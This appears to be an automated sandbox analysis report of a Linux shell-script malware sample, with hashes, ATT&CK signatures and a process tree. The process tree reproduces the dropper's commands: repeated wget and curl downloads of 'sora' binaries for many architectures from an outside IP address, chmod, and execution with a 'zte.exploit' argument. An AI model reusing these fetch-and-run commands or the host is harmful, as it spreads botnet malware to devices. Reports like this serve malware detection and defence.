Analysis
-
max time kernel
11s -
max time network
12s -
platform
debian-9_armhf -
resource
debian9-armhf-20240418-en -
resource tags
arch:armhfimage:debian9-armhf-20240418-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
18/10/2024, 03:05
Static task
static1
Behavioral task
behavioral1
Sample
f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh
-
Size
2KB
-
MD5
5ee0ae1a52cdb3d257932d6b048f6846
-
SHA1
074cd5bc461923829a352d3d3b74ca92b72e030a
-
SHA256
f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70
-
SHA512
7f917bcdf1f7be589cd8fdd2455740907a4d4941f63b4f4eb548a7ff83a4a1a553aeb5f572a6bbfdd02096c32dc9223b8985f1754494d42ef5e1a16a4a9dd25a
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 14 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 660 chmod 683 chmod 776 chmod 689 chmod 722 chmod 770 chmod 814 chmod 710 chmod 733 chmod 788 chmod 800 chmod 675 chmod 698 chmod 745 chmod -
Executes dropped EXE 14 IoCs
ioc pid Process /tmp/robben 663 robben /tmp/robben 676 robben /tmp/robben 684 robben /tmp/robben 690 robben /tmp/robben 699 robben /tmp/robben 711 robben /tmp/robben 724 robben /tmp/robben 735 robben /tmp/robben 747 robben /tmp/robben 771 robben /tmp/robben 777 robben /tmp/robben 790 robben /tmp/robben 801 robben /tmp/robben 815 robben -
Checks CPU configuration 1 TTPs 14 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 665 wget 669 curl 673 cat -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/robben f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh
Processes
-
/tmp/f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh/tmp/f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh1⤵
- Writes file to tmp directory
PID:637 -
/usr/bin/wgetwget http://93.123.85.141/bins/sora.x862⤵PID:639
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.x862⤵
- Checks CPU configuration
- Reads runtime system information
PID:649
-
-
/bin/catcat sora.x862⤵PID:658
-
-
/bin/chmodchmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M2⤵
- File and Directory Permissions Modification
PID:660
-
-
/tmp/robben./robben zte.exploit2⤵
- Executes dropped EXE
PID:663
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.mips2⤵
- System Network Configuration Discovery
PID:665
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.mips2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
PID:669
-
-
/bin/catcat sora.mips2⤵
- System Network Configuration Discovery
PID:673
-
-
/bin/chmodchmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M2⤵
- File and Directory Permissions Modification
PID:675
-
-
/tmp/robben./robben zte.exploit2⤵
- Executes dropped EXE
PID:676
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.x86_642⤵PID:679
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.x86_642⤵
- Checks CPU configuration
- Reads runtime system information
PID:681
-
-
/bin/catcat sora.x86_642⤵PID:682
-
-
/bin/chmodchmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M2⤵
- File and Directory Permissions Modification
PID:683
-
-
/tmp/robben./robben zte.exploit2⤵
- Executes dropped EXE
PID:684
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.i4682⤵PID:686
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.i4682⤵
- Checks CPU configuration
- Reads runtime system information
PID:687
-
-
/bin/catcat sora.i4682⤵PID:688
-
-
/bin/chmodchmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M2⤵
- File and Directory Permissions Modification
PID:689
-
-
/tmp/robben./robben zte.exploit2⤵
- Executes dropped EXE
PID:690
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.i6862⤵PID:692
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.i6862⤵
- Checks CPU configuration
- Reads runtime system information
PID:693
-
-
/bin/catcat sora.i6862⤵PID:696
-
-
/bin/chmodchmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M2⤵
- File and Directory Permissions Modification
PID:698
-
-
/tmp/robben./robben zte.exploit2⤵
- Executes dropped EXE
PID:699
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.mpsl2⤵PID:702
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.mpsl2⤵
- Checks CPU configuration
- Reads runtime system information
PID:705
-
-
/bin/catcat sora.mpsl2⤵PID:708
-
-
/bin/chmodchmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M2⤵
- File and Directory Permissions Modification
PID:710
-
-
/tmp/robben./robben zte.exploit2⤵
- Executes dropped EXE
PID:711
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm42⤵PID:714
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm42⤵
- Checks CPU configuration
- Reads runtime system information
PID:717
-
-
/bin/catcat sora.arm42⤵PID:720
-
-
/bin/chmodchmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M2⤵
- File and Directory Permissions Modification
PID:722
-
-
/tmp/robben./robben zte.exploit2⤵
- Executes dropped EXE
PID:724
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm52⤵PID:726
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm52⤵
- Checks CPU configuration
- Reads runtime system information
PID:729
-
-
/bin/catcat sora.arm52⤵PID:732
-
-
/bin/chmodchmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M2⤵
- File and Directory Permissions Modification
PID:733
-
-
/tmp/robben./robben zte.exploit2⤵
- Executes dropped EXE
PID:735
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm62⤵PID:737
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm62⤵
- Checks CPU configuration
- Reads runtime system information
PID:740
-
-
/bin/catcat sora.arm62⤵PID:744
-
-
/bin/chmodchmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M2⤵
- File and Directory Permissions Modification
PID:745
-
-
/tmp/robben./robben zte.exploit2⤵
- Executes dropped EXE
PID:747
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm72⤵PID:749
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm72⤵
- Checks CPU configuration
- Reads runtime system information
PID:754
-
-
/bin/catcat sora.arm72⤵PID:769
-
-
/bin/chmodchmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M2⤵
- File and Directory Permissions Modification
PID:770
-
-
/tmp/robben./robben zte.exploit2⤵
- Executes dropped EXE
PID:771
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.ppc2⤵PID:773
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.ppc2⤵
- Checks CPU configuration
- Reads runtime system information
PID:774
-
-
/bin/catcat sora.ppc2⤵PID:775
-
-
/bin/chmodchmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M2⤵
- File and Directory Permissions Modification
PID:776
-
-
/tmp/robben./robben zte.exploit2⤵
- Executes dropped EXE
PID:777
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.ppc440fp2⤵PID:780
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.ppc440fp2⤵
- Checks CPU configuration
- Reads runtime system information
PID:783
-
-
/bin/catcat sora.ppc440fp2⤵PID:787
-
-
/bin/chmodchmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M2⤵
- File and Directory Permissions Modification
PID:788
-
-
/tmp/robben./robben zte.exploit2⤵
- Executes dropped EXE
PID:790
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.m68k2⤵PID:792
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.m68k2⤵
- Checks CPU configuration
- Reads runtime system information
PID:795
-
-
/bin/catcat sora.m68k2⤵PID:799
-
-
/bin/chmodchmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M2⤵
- File and Directory Permissions Modification
PID:800
-
-
/tmp/robben./robben zte.exploit2⤵
- Executes dropped EXE
PID:801
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.sh42⤵PID:804
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.sh42⤵
- Checks CPU configuration
- Reads runtime system information
PID:808
-
-
/bin/catcat sora.sh42⤵PID:812
-
-
/bin/chmodchmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M2⤵
- File and Directory Permissions Modification
PID:814
-
-
/tmp/robben./robben zte.exploit2⤵
- Executes dropped EXE
PID:815
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1